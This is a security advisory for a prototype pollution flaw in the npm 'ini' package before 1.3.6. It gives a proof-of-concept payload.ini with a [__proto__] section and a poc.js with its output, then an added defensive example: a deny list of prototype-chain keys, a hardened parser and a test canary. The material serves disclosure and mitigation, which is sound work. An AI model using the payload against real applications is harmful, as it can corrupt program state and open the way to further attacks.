[NPM:GHSA-QQGX-2P2H-9C37] ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Severity: High
Affected Packages: 1
Fixed Packages: 1
CVEs: 1
Overview
The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype of the application's objects: a section named `__proto__` writes its keys onto `Object.prototype`, so every plain object in the process inherits them. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini:
```
[__proto__]
polluted = "polluted"
```
poc.js:
```
var fs = require('fs')
var ini = require('ini')
// Parse the attacker-controlled file; the [__proto__] section lands on Object.prototype
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)            // the parsed object itself has no own keys
console.log(parsed.__proto__)  // Object.prototype now carries "polluted"
console.log(polluted)          // resolves through the global object's prototype chain
```
```
node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
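The reproduction above shows the effect; the fix in 1.3.6 is to skip the `__proto__` section rather than assign it. The following is an added example, not code from the `ini` package or from the advisory, that demonstrates the defensive side for an application that consumes untrusted INI input: a pre-parse check that reports section headers or keys aimed at the prototype chain, a hardened minimal parser that builds null-prototype containers and drops such names outright, and a canary that tells a test suite whether `Object.prototype` has already been polluted in the running process. The key list, the `findDangerousKeys`/`safeParse`/`prototypePolluted` names and the sample input are assumptions made for this example; the parser handles flat sections only and does not implement `ini`'s dotted-section nesting.

```javascript
'use strict';
// Added example (not the ini package's code): defensive handling of INI input.

// Property names that reach the prototype chain of a plain object instead of
// the object itself. These are the names a parser must never assign through.
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Split a section header on '.', because ini nests dotted sections
// ([a.b] becomes {a: {b: ...}}), so each segment is a property name.
function sectionSegments(name) {
  return name.split('.').map((s) => s.trim());
}

// Pre-parse check: report every section header or key whose name targets the
// prototype chain, with a 1-based line number, so input can be rejected early.
function findDangerousKeys(iniText) {
  const findings = [];
  iniText.split(/\r?\n/).forEach((raw, index) => {
    const line = raw.trim();
    if (line === '' || line[0] === ';' || line[0] === '#') return; // blank or comment
    const section = line.match(/^\[(.+)\]$/);
    if (section) {
      for (const seg of sectionSegments(section[1])) {
        if (DANGEROUS_KEYS.has(seg)) findings.push({ line: index + 1, key: seg, kind: 'section' });
      }
      return;
    }
    const kv = line.match(/^([^=]+?)\s*=/);
    if (kv && DANGEROUS_KEYS.has(kv[1].trim())) {
      findings.push({ line: index + 1, key: kv[1].trim(), kind: 'key' });
    }
  });
  return findings;
}

// Strip one layer of surrounding double quotes from a value.
function unquote(value) {
  return value.length >= 2 && value[0] === '"' && value[value.length - 1] === '"'
    ? value.slice(1, -1)
    : value;
}

// Hardened minimal parser (flat sections only):
// - every container is Object.create(null), so no inherited __proto__ setter
//   exists to be triggered by a key assignment;
// - sections and keys with dangerous names are dropped, so the result cannot
//   pollute anything it is later merged into with Object.assign or similar.
function safeParse(iniText) {
  const root = Object.create(null);
  let current = root;
  for (const raw of iniText.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '' || line[0] === ';' || line[0] === '#') continue;
    const section = line.match(/^\[(.+)\]$/);
    if (section) {
      const name = section[1].trim();
      if (sectionSegments(name).some((seg) => DANGEROUS_KEYS.has(seg))) {
        current = null; // swallow the entire section, keys included
        continue;
      }
      current = Object.create(null);
      root[name] = current;
      continue;
    }
    if (current === null) continue;
    const kv = line.match(/^([^=]+?)\s*=\s*(.*)$/);
    if (!kv) continue;
    const key = kv[1].trim();
    if (DANGEROUS_KEYS.has(key)) continue;
    current[key] = unquote(kv[2].trim());
  }
  return root;
}

// Canary for test suites: true if `key` has been written onto Object.prototype
// anywhere in this process (e.g. by a vulnerable parser that ran earlier).
function prototypePolluted(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}

// Constructed sample input: one benign section plus the advisory's payload.
const SAMPLE_INI = [
  '; constructed sample input',
  '[database]',
  'host = "localhost"',
  '',
  '[__proto__]',
  'polluted = "polluted"',
].join('\n');

console.log('findings:', findDangerousKeys(SAMPLE_INI));
const parsed = safeParse(SAMPLE_INI);
console.log('parsed:', parsed);
console.log('Object.prototype polluted?', prototypePolluted('polluted'));
```

Running the block prints one finding for the `[__proto__]` header on line 5, a parsed result containing only the `database` section, and `false` for the canary, since the dangerous section never reaches an assignment. Using `findDangerousKeys` as a gate before calling any third-party INI parser is the cheapest mitigation when upgrading is not immediately possible; the canary is useful in CI to catch a regression in whichever parser the application actually uses.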
Package | Affected Version |
---|---|
pkg:npm/ini | < 1.3.6 |
Package | Fixed Version |
---|---|
pkg:npm/ini | = 1.3.6 |
- ID: NPM:GHSA-QQGX-2P2H-9C37
- Severity: high
- URL: https://github.com/advisories/GHSA-qqgx-2p2h-9c37
- Published: 2020-12-10T16:53:45
- Modified: 2023-08-31T23:39:55
- Rights: NPM Security Team
- Other Advisories:
- ALSA-2021:0548
- ALSA-2021:0549
- ALSA-2021:0551
- ALSA-2021:5171
- ALSA-2022:0350
- ALSA-2022:6595
- ELSA-2021-0548
- ELSA-2021-0549
- ELSA-2021-0551
- ELSA-2021-5171
- ELSA-2022-0350
- ELSA-2022-6595
- RHSA-2021:0548
- RHSA-2021:0549
- RHSA-2021:0551
- RHSA-2021:5171
- RHSA-2022:0350
- RHSA-2022:6595
- RLSA-2021:0548
- RLSA-2021:0549
- RLSA-2021:0551
- RLSA-2021:5171
- RLSA-2022:0350